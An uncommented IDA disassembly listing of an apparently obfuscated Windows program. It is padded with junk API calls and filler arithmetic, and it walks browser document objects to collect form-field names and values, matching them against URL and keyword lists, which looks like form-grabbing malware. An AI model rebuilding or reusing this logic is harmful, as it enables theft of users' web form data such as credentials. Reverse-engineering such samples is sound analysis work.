var_525E8 = dword ptr -525E8h
var_525E4 = dword ptr -525E4h
var_525DF = byte ptr -525DFh
var_524E0 = byte ptr -524E0h
var_524D8 = dword ptr -524D8h
var_524CC = dword ptr -524CCh
var_524C8 = byte ptr -524C8h
var_39E28 = byte ptr -39E28h
var_21788 = word ptr -21788h
var_21786 = word ptr -21786h
var_21784 = dword ptr -21784h
var_2177D = byte ptr -2177Dh
var_1177E = word ptr -1177Eh
var_1177C = word ptr -1177Ch
var_10FAC = dword ptr -10FACh
var_10FA8 = dword ptr -10FA8h
var_10FA4 = dword ptr -10FA4h
var_10001 = byte ptr -10001h
var_2 = word ptr -2
push ebp
mov ebp, esp
mov eax, 6382Ch
call sub_40C8BC
push ebx
push esi
push edi
lea edi, [ebp+var_5263A]
lea esi, a1Nuf ; "1+nuf"
mov ecx, 3
rep movsw
push offset aValue ; "value"
call sub_40BE30
mov [ebp+var_10FA8], eax
call sub_40C938 ; GetCurrentProcessId
push offset aName ; "name"
call sub_40BE30
mov [ebp+var_10FAC], eax
call sub_40C968 ; RtlGetLastWin32Error
lea eax, [ebp+var_5262C]
push eax
call sub_406A6B
pop ecx
or eax, eax
jz loc_407F74
call sub_40C938 ; GetCurrentProcessId
loc_406F10: ; CODE XREF: sub_406EA8+A9�j
; sub_406EA8+CB�j ...
push 0
call sub_40CDDC
call sub_40CBE4 ; GetForegroundWindow
mov [ebp+var_52610], eax
call sub_40C9C8 ; GetTickCount
push [ebp+var_52610]
lea eax, [ebp+var_5262C]
push eax
call sub_406B58
add esp, 0Ch
mov [ebp+var_52611], 4Ch
add [ebp+var_52611], 1
cmp dword_442370, 0
jz short loc_406F10
call sub_40CA58 ; IsDebuggerPresent
lea eax, [ebp+var_525F4]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
call sub_40C944 ; GetCurrentThreadId
or ebx, ebx
jnz short loc_406F10
call sub_40C9D4 ; GetVersion
lea eax, [ebp+var_525F8]
push eax
push offset dword_447B0C
mov eax, [ebp+var_525F4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call sub_40C968 ; RtlGetLastWin32Error
or ebx, ebx
jnz loc_407F56
lea edi, [ebp+var_5263D]
lea esi, aT_1 ; "T "
mov ecx, 3
rep movsb
lea eax, [ebp+var_52630]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
lea edi, [ebp+var_52643]
lea esi, aM7x ; "M&7X<"
mov ecx, 3
rep movsw
or ebx, ebx
jnz loc_407F27
call sub_40C9C8 ; GetTickCount
push offset byte_41FD50
push [ebp+var_52630]
call sub_4069C0
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_52648], edi
mov eax, [ebp+var_52610]
mov ds:dword_42FD54, eax
lea eax, [ebp+var_525FA]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
call sub_40C998 ; GetProcessHeap
or ebx, ebx
jnz loc_407F27
cmp [ebp+var_525FA], 0
jz short loc_407058
mov [ebp+var_52618], 4079h
add [ebp+var_52618], 45D6h
jmp loc_407F27
; ---------------------------------------------------------------------------
loc_407058: ; CODE XREF: sub_406EA8+195�j
lea edi, [ebp+var_5264E]
lea esi, aFauI ; "fu,I"
mov ecx, 3
rep movsw
lea edi, [ebp+var_52655]
lea esi, aTyVj ; "TY Vj"
mov ecx, 7
rep movsb
mov [ebp+var_10001], 0
mov [ebp+var_2], 0
lea eax, [ebp+var_52600]
push eax
mov eax, [ebp+var_525F8]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
mov [ebp+var_5261C], 3253h
sub [ebp+var_5261C], 1F71h
or ebx, ebx
jnz loc_407F27
mov [ebp+var_52620], 3E52h
sub [ebp+var_52620], 4F8Bh
lea eax, [ebp+var_52634]
push eax
mov eax, [ebp+var_52600]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
call sub_40C9C8 ; GetTickCount
or ebx, ebx
jnz loc_407F0D
mov eax, dword_4423E4
mov [ebp+var_5265A+1], eax
or [ebp+var_524CC], 0FFFFFFFFh
loc_407105: ; CODE XREF: sub_406EA8+B36�j
call sub_40CA58 ; IsDebuggerPresent
and [ebp+var_52604], 0
and [ebp+var_5260C], 0
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_407148
call sub_40C9C8 ; GetTickCount
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_525F8]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
or ebx, ebx
jz loc_407269
jmp loc_4079CC
; ---------------------------------------------------------------------------
loc_407148: ; CODE XREF: sub_406EA8+277�j
mov ax, word_4423E8
mov [ebp+var_52692], ax
mov word ptr [ebp+var_52690], 17h
mov eax, [ebp+var_524CC]
mov [ebp+var_52688], eax
lea eax, [ebp+var_526A8]
push eax
lea eax, [ebp+var_52690]
push eax
mov eax, [ebp+var_52600]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_52604]
push eax
push offset dword_447B3C
mov eax, [ebp+var_526A0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_4079CC
lea eax, [ebp+var_5260C]
push eax
mov eax, [ebp+var_52604]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
mov eax, dword_4423EA
mov [ebp+var_526AC], eax
or ebx, ebx
jz short loc_407212
lea edi, [ebp+var_526B1]
lea esi, word_4423EE
mov ecx, 3
rep movsb
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov [ebp+var_526AE], 3F10h
movzx eax, [ebp+var_526AE]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_526AE], ax
jmp loc_4079CC
; ---------------------------------------------------------------------------
loc_407212: ; CODE XREF: sub_406EA8+327�j
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_5260C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov [ebp+var_52680], 3FC7h
sub [ebp+var_52680], 1897h
or ebx, ebx
jz short loc_407269
call sub_40C968 ; RtlGetLastWin32Error
mov eax, [ebp+var_5260C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
call sub_40C9C8 ; GetTickCount
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+8]
call sub_40C938 ; GetCurrentProcessId
jmp loc_4079CC
; ---------------------------------------------------------------------------
loc_407269: ; CODE XREF: sub_406EA8+295�j
; sub_406EA8+393�j
lea eax, [ebp+var_525EC]
push eax
mov eax, [ebp+var_525E4]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
or ebx, ebx
jnz loc_407EA7
call sub_40C9C8 ; GetTickCount
and [ebp+var_21784], 0
jmp loc_4079BA
; ---------------------------------------------------------------------------
loc_407297: ; CODE XREF: sub_406EA8+B1E�j
call sub_40C9D4 ; GetVersion
push 0
call sub_40CDDC
pop ecx
call sub_40C9D4 ; GetVersion
mov [ebp+var_626B8], 2
mov eax, [ebp+var_21784]
mov [ebp+var_626B0], eax
lea eax, [ebp+var_626A4]
push eax
lea esi, [ebp+var_626B8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_626B8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_525E4]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
or ebx, ebx
jnz loc_4079B4
call sub_40C998 ; GetProcessHeap
and [ebp+var_626BC], 0
lea eax, [ebp+var_626BC]
push eax
push offset dword_447B1C
mov eax, [ebp+var_626A4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
lea edi, [ebp+var_627D5]
lea esi, aKer ; "~kER"
mov ecx, 5
rep movsb
or ebx, ebx
jnz loc_40769D
call sub_40C998 ; GetProcessHeap
lea eax, [ebp+var_626C4]
push eax
mov eax, [ebp+var_626BC]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
call sub_40C9D4 ; GetVersion
or ebx, ebx
jnz loc_40769D
call sub_40C944 ; GetCurrentThreadId
lea eax, [ebp+var_62687]
push eax
push [ebp+var_626C4]
call sub_4069C0
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_6269C], edi
mov [ebp+var_627C4], 0CEh
add [ebp+var_627C4], 1
and [ebp+var_52684], 0
jmp short loc_4073D1
; ---------------------------------------------------------------------------
loc_4073A8: ; CODE XREF: sub_406EA8+535�j
mov eax, [ebp+var_52684]
mov al, [ebp+eax+var_62687]
cmp al, 0Dh
jz short loc_4073BD
cmp al, 0Ah
jnz short loc_4073CB
loc_4073BD: ; CODE XREF: sub_406EA8+50F�j
mov eax, [ebp+var_52684]
mov [ebp+eax+var_62687], 0
loc_4073CB: ; CODE XREF: sub_406EA8+513�j
inc [ebp+var_52684]
loc_4073D1: ; CODE XREF: sub_406EA8+4FE�j
mov eax, [ebp+var_6269C]
cmp [ebp+var_52684], eax
jb short loc_4073A8
mov [ebp+var_627C6], 7C4Fh
add [ebp+var_627C6], 673Bh
lea edi, [ebp+var_627DC]
lea esi, a@mB1 ; "@m|~b1"
mov ecx, 7
rep movsb
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_407449
call sub_40C998 ; GetProcessHeap
push 11h
push offset word_446F2A
call sub_406E1B
push [ebp+var_21784]
push eax
lea edi, [ebp+var_627C3]
push edi
call sub_40CE54
lea eax, [ebp+var_627C3]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CE78
add esp, 1Ch
jmp short loc_4074AC
; ---------------------------------------------------------------------------
loc_407449: ; CODE XREF: sub_406EA8+563�j
mov [ebp+var_627E2], 5530h
movzx eax, [ebp+var_627E2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_627E2], ax
push 13h
push offset word_446F16
call sub_406E1B
push [ebp+var_21784]
push [ebp+var_524CC]
push eax
lea edi, [ebp+var_627C3]
push edi
call sub_40CE54
lea eax, [ebp+var_627C3]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CE78
add esp, 20h
mov eax, dword_4423FD
mov [ebp+var_627E6], eax
loc_4074AC: ; CODE XREF: sub_406EA8+59F�j
and [ebp+var_52684], 0
loc_4074B3: ; CODE XREF: sub_406EA8+6F3�j
mov eax, [ebp+var_52684]
lea ecx, [ebp+eax+var_62687]
or eax, 0FFFFFFFFh
loc_4074C3: ; CODE XREF: sub_406EA8+620�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4074C3
mov [ebp+var_62690], eax
call sub_40C9D4 ; GetVersion
mov eax, [ebp+var_62690]
cmp eax, 0
jz short loc_4074E7
cmp eax, 0C8h
jbe short loc_4074EC
loc_4074E7: ; CODE XREF: sub_406EA8+636�j
jmp loc_407582
; ---------------------------------------------------------------------------
loc_4074EC: ; CODE XREF: sub_406EA8+63D�j
mov [ebp+var_627CC], 0CF2h
mov eax, 4FA4h
mul [ebp+var_627CC]
mov [ebp+var_627E6+2], eax
mov [ebp+var_627CC], eax
cmp [ebp+var_62690], 1
jnz short loc_407526
mov eax, [ebp+var_52684]
cmp [ebp+eax+var_62687], 20h
jz short loc_407582
loc_407526: ; CODE XREF: sub_406EA8+66C�j
push 1
push offset byte_446F14
call sub_406E1B
push eax
lea edi, [ebp+var_10001]
push edi
call sub_40CE78
call sub_40C944 ; GetCurrentThreadId
mov eax, [ebp+var_52684]
lea eax, [ebp+eax+var_62687]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CE78
add esp, 18h
mov [ebp+var_627D0], 1601h
mov eax, 2711h
mul [ebp+var_627D0]
mov [ebp-627E8h], eax
mov [ebp+var_627D0], eax
loc_407582: ; CODE XREF: sub_406EA8:loc_4074E7�j
; sub_406EA8+67C�j
mov eax, [ebp+var_62690]
inc eax
add [ebp+var_52684], eax
mov eax, [ebp+var_6269C]
cmp [ebp+var_52684], eax
jb loc_4074B3
mov [ebp+var_626BD], 2Ah
movzx eax, [ebp+var_626BD]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_626BD], al
and [ebp+var_62698], 0
lea ecx, [ebp+var_10001]
or eax, 0FFFFFFFFh
loc_4075CB: ; CODE XREF: sub_406EA8+728�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4075CB
mov [ebp+var_62690], eax
mov [ebp+var_52684], 0
jmp loc_40767D
; ---------------------------------------------------------------------------
loc_4075E7: ; CODE XREF: sub_406EA8+7E1�j
call sub_40CA58 ; IsDebuggerPresent
mov eax, [ebp+var_52684]
cmp [ebp+eax+var_10001], 20h
jz short loc_407603
and [ebp+var_6268C], 0
loc_407603: ; CODE XREF: sub_406EA8+752�j
call sub_40C9D4 ; GetVersion
cmp [ebp+var_6268C], 0
jnz short loc_40764F
lea edi, [ebp+var_627EC]
lea esi, byte_442401
mov ecx, 3
rep movsb
mov eax, [ebp+var_62698]
mov edx, [ebp+var_52684]
mov dl, [ebp+edx+var_10001]
mov [ebp+eax+var_10001], dl
mov eax, dword_442404
mov [ebp+var_627F0], eax
inc [ebp+var_62698]
loc_40764F: ; CODE XREF: sub_406EA8+767�j
mov eax, [ebp+var_52684]
cmp [ebp+eax+var_10001], 20h
jnz short loc_407669
mov [ebp+var_6268C], 1
loc_407669: ; CODE XREF: sub_406EA8+7B5�j
mov byte ptr [ebp+var_627EC+3], 9
add byte ptr [ebp+var_627EC+3], 0B1h
inc [ebp+var_52684]
loc_40767D: ; CODE XREF: sub_406EA8+73A�j
mov eax, [ebp+var_62690]
cmp [ebp+var_52684], eax
jb loc_4075E7
mov eax, [ebp+var_62698]
mov [ebp+eax+var_10001], 0
loc_40769D: ; CODE XREF: sub_406EA8+496�j
; sub_406EA8+4C0�j
and [ebp+var_62694], 0
lea eax, [ebp+var_62694]
push eax
push offset dword_447B2C
mov eax, [ebp+var_626A4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
lea edi, [ebp+var_627DF]
lea esi, byte_442408
mov ecx, 3
rep movsb
or ebx, ebx
jnz loc_407982
call sub_40C9C8 ; GetTickCount
lea eax, [ebp+var_626A0]
push eax
mov eax, [ebp+var_62694]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
call sub_40C968 ; RtlGetLastWin32Error
or ebx, ebx
jnz loc_407953
and [ebp+var_52688], 0
jmp loc_40793F
; ---------------------------------------------------------------------------
loc_407710: ; CODE XREF: sub_406EA8+AA3�j
call sub_40C9D4 ; GetVersion
push 0
call sub_40CDDC
pop ecx
mov [ebp+var_62800], 2
mov eax, [ebp+var_52688]
mov [ebp+var_627F8], eax
lea eax, [ebp+var_627F0]
push eax
lea esi, [ebp+var_62800]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_62800]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_62694]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
or ebx, ebx
jnz loc_407939
and [ebp+var_627EC], 0
lea eax, [ebp+var_627EC]
push eax
push offset dword_447B1C
mov eax, [ebp+var_627F0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov [ebp+var_62812], 7E5Bh
add [ebp+var_62812], 501Eh
or ebx, ebx
jnz loc_407916
lea edi, [ebp+var_62816]
lea esi, byte_44240B
mov ecx, 3
rep movsb
cmp [ebp+var_627EC], 0
jz loc_407916
call sub_40C9D4 ; GetVersion
lea eax, [ebp+var_62810]
push eax
push 0
push [ebp+var_10FA8]
mov eax, [ebp+var_627EC]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
lea edi, [ebp+var_6281B]
lea esi, a1rgk ; "1Rgk"
mov ecx, 5
rep movsb
or ebx, ebx
jnz loc_407916
mov ax, word_442413
mov [ebp+var_6281E+1], ax
cmp [ebp+var_62810], 8
jnz loc_407916
mov [ebp+var_62813], 70h
add [ebp+var_62813], 40h
movzx edi, [ebp+var_2]
mov esi, [ebp+var_627EC]
mov [ebp+edi*4+var_10FA4], esi
movzx edi, [ebp+var_2]
mov esi, [ebp+var_52688]
mov [ebp+edi*2+var_1177C], si
lea eax, [ebp+var_62810]
push eax
push 0
push [ebp+var_10FAC]
mov eax, [ebp+var_627EC]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz loc_407912
mov [ebp+var_6381E], 1487h
movzx eax, [ebp+var_6381E]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_6381E], ax
mov ax, word_442415
mov [ebp+var_63826], ax
call sub_40C968 ; RtlGetLastWin32Error
lea eax, [ebp+var_6381C]
push eax
push [ebp+var_62808]
call sub_4069C0
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_63824], edi
lea edi, [ebp+var_6382B]
lea esi, aP_1 ; "&p|*"
mov ecx, 5
rep movsb
cmp [ebp+var_6381C], 0
jz short loc_40790D
cmp [ebp+var_63824], 64h
jnb short loc_40790D
lea eax, [ebp+var_6381C]
push eax
movzx eax, [ebp+var_2]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
call sub_40C8DC
loc_40790D: ; CODE XREF: sub_406EA8+A3F�j
; sub_406EA8+A48�j
call sub_40C968 ; RtlGetLastWin32Error
loc_407912: ; CODE XREF: sub_406EA8+9D2�j
inc [ebp+var_2]
loc_407916: ; CODE XREF: sub_406EA8+904�j
; sub_406EA8+924�j ...
cmp [ebp+var_627EC], 0
jz short $+2
cmp [ebp+var_627F0], 0
jz short loc_407934
mov eax, [ebp+var_627F0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407934: ; CODE XREF: sub_406EA8+A7E�j
call sub_40C9D4 ; GetVersion
loc_407939: ; CODE XREF: sub_406EA8+8C5�j
inc [ebp+var_52688]
loc_40793F: ; CODE XREF: sub_406EA8+863�j
mov eax, [ebp+var_626A0]
cmp [ebp+var_52688], eax
jb loc_407710
jmp short loc_4079B4
; ---------------------------------------------------------------------------
loc_407953: ; CODE XREF: sub_406EA8+856�j
cmp [ebp+var_62694], 0
jz short loc_407968
mov eax, [ebp+var_62694]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407968: ; CODE XREF: sub_406EA8+AB2�j
mov [ebp+var_626BE], 0B7h
movzx eax, [ebp+var_626BE]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_626BE], al
loc_407982: ; CODE XREF: sub_406EA8+82F�j
cmp [ebp+var_626A4], 0
jz short loc_407997
mov eax, [ebp+var_626A4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407997: ; CODE XREF: sub_406EA8+AE1�j
mov [ebp+var_626C0], 7BFDh
movzx eax, [ebp+var_626C0]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_626C0], ax
loc_4079B4: ; CODE XREF: sub_406EA8+451�j
; sub_406EA8+AA9�j
inc [ebp+var_21784]
loc_4079BA: ; CODE XREF: sub_406EA8+3EA�j
mov eax, [ebp+var_525EC]
cmp [ebp+var_21784], eax
jb loc_407297
loc_4079CC: ; CODE XREF: sub_406EA8+29B�j
; sub_406EA8+2FC�j ...
inc [ebp+var_524CC]
mov eax, [ebp+var_52634]
cmp [ebp+var_524CC], eax
jl loc_407105
mov [ebp+var_52621], 8Dh
sub [ebp+var_52621], 9Bh
loc_4079F2: ; CODE XREF: sub_406EA8+C5D�j
push 0
call sub_40CDDC
pop ecx
call sub_40C998 ; GetProcessHeap
mov [ebp+var_21786], 0
jmp loc_407AC9
; ---------------------------------------------------------------------------
loc_407A0D: ; CODE XREF: sub_406EA8+C2E�j
lea edi, [ebp+var_62685]
lea esi, byte_44241C
xor ecx, ecx
inc ecx
rep movsb
lea eax, [ebp+var_524E0]
push eax
push 0
push [ebp+var_10FA8]
movzx edi, [ebp+var_21786]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
call sub_40C968 ; RtlGetLastWin32Error
or ebx, ebx
jnz short loc_407AC2
mov [ebp+var_62680], 1601h
inc [ebp+var_62680]
lea edi, [ebp+var_62690+3]
lea esi, aVG_tM ; " .T<m"
movsd
movsd
lea eax, [ebp+var_6267D]
push eax
push [ebp+var_524D8]
call sub_4069C0
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_62684], edi
call sub_40CA58 ; IsDebuggerPresent
cmp [ebp+var_6267D], 0
jz short loc_407AC2
call sub_40C9D4 ; GetVersion
cmp [ebp+var_62684], 64h
jnb short loc_407AC2
lea eax, [ebp+var_6267D]
push eax
movzx eax, [ebp+var_21786]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
call sub_40C8DC
loc_407AC2: ; CODE XREF: sub_406EA8+BA2�j
; sub_406EA8+BEC�j ...
inc [ebp+var_21786]
loc_407AC9: ; CODE XREF: sub_406EA8+B60�j
movzx eax, [ebp+var_21786]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_407A0D
lea eax, [ebp+var_525FA]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
or ebx, ebx
jnz loc_407F27
call sub_40C998 ; GetProcessHeap
cmp [ebp+var_525FA], 0
jz loc_4079F2
call sub_40C9C8 ; GetTickCount
lea edi, [ebp+var_5265F]
lea esi, aBktcd ; "BKTcd"
mov ecx, 3
rep movsw
mov [ebp+var_2177D], 0
push offset byte_41FD50
lea eax, [ebp+var_2177D]
push eax
call sub_40C8DC
mov [ebp+var_525E8], 1
mov [ebp+var_1177E], 0
jmp loc_407C6E
; ---------------------------------------------------------------------------
loc_407B54: ; CODE XREF: sub_406EA8+DD3�j
mov [ebp+var_52684], 4C26h
inc [ebp+var_52684]
movzx eax, [ebp+var_1177E]
imul eax, 64h
cmp [ebp+eax+var_524C8], 0
jz loc_407C67
call sub_40C938 ; GetCurrentProcessId
and [ebp+var_525E8], 0
push 4
push offset byte_446F0F
call sub_406E1B
movzx edi, [ebp+var_1177E]
push edi
push eax
lea edi, [ebp+var_525DF]
push edi
call sub_40CE54
mov word ptr [ebp+var_52688+2], 3C74h
inc word ptr [ebp+var_52688+2]
lea eax, [ebp+var_525DF]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CE78
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CE78
mov word ptr [ebp+var_52688], 2CFFh
movzx eax, word ptr [ebp+var_52688]
imul eax, 66C8h
mov word ptr [ebp+var_52688], ax
push 1
push offset byte_446F0D
call sub_406E1B
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40CE78
call sub_40C938 ; GetCurrentProcessId
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CE78
add esp, 3Ch
mov [ebp+var_5268C], 7CE2h
mov eax, 50A1h
mul [ebp+var_5268C]
mov [ebp+var_52690], eax
mov [ebp+var_5268C], eax
loc_407C67: ; CODE XREF: sub_406EA8+CCE�j
inc [ebp+var_1177E]
loc_407C6E: ; CODE XREF: sub_406EA8+CA7�j
movzx eax, [ebp+var_1177E]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_407B54
cmp [ebp+var_525E8], 0
jnz loc_407EA7
push 1
push offset byte_446F0B
call sub_406E1B
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40CE78
lea edi, [ebp+var_52665]
lea esi, aE0zf6 ; "e0zf6"
mov ecx, 3
rep movsw
lea eax, [ebp+var_10001]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CE78
add esp, 18h
mov [ebp+var_52622], 7Eh
movzx eax, [ebp+var_52622]
imul eax, 1BE4h
mov [ebp+var_52622], al
cmp ds:byte_41FD50, 68h
jnz short loc_407D0F
cmp ds:byte_41FD51, 74h
jnz short loc_407D0F
cmp ds:byte_41FD52, 74h
jnz short loc_407D0F
cmp ds:byte_41FD53, 70h
jz short loc_407D14
loc_407D0F: ; CODE XREF: sub_406EA8+E4A�j
; sub_406EA8+E53�j ...
jmp loc_407E61
; ---------------------------------------------------------------------------
loc_407D14: ; CODE XREF: sub_406EA8+E65�j
call sub_40C944 ; GetCurrentThreadId
push 8
push offset word_446F02
call sub_406E1B
mov edi, 0Ch
sub edi, dword_4423B4
push edi
push eax
push offset byte_41FD50
call sub_401883
add esp, 14h
cmp eax, 0FFFFh
jz short loc_407D77
push 0Eh
push offset byte_446EF3
call sub_406E1B
mov edi, 8
sub edi, dword_4423B0
push edi
push eax
push offset byte_41FD50
call sub_401883
add esp, 14h
cmp eax, 0FFFFh
jz loc_407E61
loc_407D77: ; CODE XREF: sub_406EA8+E9C�j
call sub_40CA58 ; IsDebuggerPresent
mov [ebp+var_525EE], 0
loc_407D85: ; CODE XREF: sub_406EA8+F86�j
mov eax, 0Ch
sub eax, dword_4423B4
push eax
movzx eax, [ebp+var_525EE]
lea eax, ds:4423C0h[eax]
push eax
push offset byte_41FD50
call sub_401883
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_407DE4
call sub_40C998 ; GetProcessHeap
push 1
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F268
mov [ebp+var_52684], 3041h
mov eax, [ebp+var_52684]
mov edx, eax
add edx, eax
mov [ebp+var_52684], edx
jmp short loc_407E61
; ---------------------------------------------------------------------------
loc_407DE4: ; CODE XREF: sub_406EA8+F0A�j
movzx eax, [ebp+var_525EE]
mov [ebp+var_52684], eax
lea ecx, ds:4423C0h[eax]
or eax, 0FFFFFFFFh
loc_407DFB: ; CODE XREF: sub_406EA8+F58�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_407DFB
mov esi, [ebp+var_52684]
add esi, eax
mov edi, esi
mov [ebp+var_525EE], di
call sub_40C9D4 ; GetVersion
inc [ebp+var_525EE]
movzx eax, [ebp+var_525EE]
cmp byte_4423C0[eax], 0
jnz loc_407D85
mov eax, dword_442431
mov [ebp+var_52669], eax
push 0
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F268
lea edi, [ebp+var_52670]
lea esi, aANfd ; " nfd"
mov ecx, 7
rep movsb
loc_407E61: ; CODE XREF: sub_406EA8:loc_407D0F�j
; sub_406EA8+EC9�j ...
mov [ebp+var_21788], 0
jmp short loc_407E98
; ---------------------------------------------------------------------------
loc_407E6C: ; CODE XREF: sub_406EA8+FFD�j
movzx edi, [ebp+var_21788]
cmp [ebp+edi*4+var_10FA4], 0
jz short loc_407E91
movzx edi, [ebp+var_21788]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+8]
loc_407E91: ; CODE XREF: sub_406EA8+FD3�j
inc [ebp+var_21788]
loc_407E98: ; CODE XREF: sub_406EA8+FC2�j
movzx eax, [ebp+var_21788]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_407E6C
loc_407EA7: ; CODE XREF: sub_406EA8+3D8�j
; sub_406EA8+DE0�j
cmp [ebp+var_525E4], 0
jz short loc_407EBC
mov eax, [ebp+var_525E4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407EBC: ; CODE XREF: sub_406EA8+1006�j
lea edi, [ebp+var_52678]
lea esi, aG4ug7i ; "g4Ug,7I"
movsd
movsd
cmp [ebp+var_5260C], 0
jz short loc_407EDF
mov eax, [ebp+var_5260C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407EDF: ; CODE XREF: sub_406EA8+1029�j
lea edi, [ebp+var_5267E]
lea esi, aFmC ; "Fm>c`"
mov ecx, 3
rep movsw
cmp [ebp+var_52604], 0
jz short loc_407F08
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F08: ; CODE XREF: sub_406EA8+1052�j
call sub_40C9D4 ; GetVersion
loc_407F0D: ; CODE XREF: sub_406EA8+245�j
cmp [ebp+var_52600], 0
jz short loc_407F22
mov eax, [ebp+var_52600]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F22: ; CODE XREF: sub_406EA8+106C�j
call sub_40C9C8 ; GetTickCount
loc_407F27: ; CODE XREF: sub_406EA8+13A�j
; sub_406EA8+187�j ...
cmp [ebp+var_525F8], 0
jz short loc_407F3C
mov eax, [ebp+var_525F8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F3C: ; CODE XREF: sub_406EA8+1086�j
mov [ebp+var_52605], 2Dh
movzx eax, [ebp+var_52605]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_52605], al
loc_407F56: ; CODE XREF: sub_406EA8+F7�j
cmp [ebp+var_525F4], 0
jz loc_406F10
mov eax, [ebp+var_525F4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_406F10
; ---------------------------------------------------------------------------
loc_407F74: ; CODE XREF: sub_406EA8+5D�j
pop edi
pop esi
pop ebx
leave
retn
sub_406EA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F79 proc near ; DATA XREF: sub_40802E+22�o
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset byte_44244B
push offset sub_40109A
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_1A], 6828h
inc [ebp+var_1A]
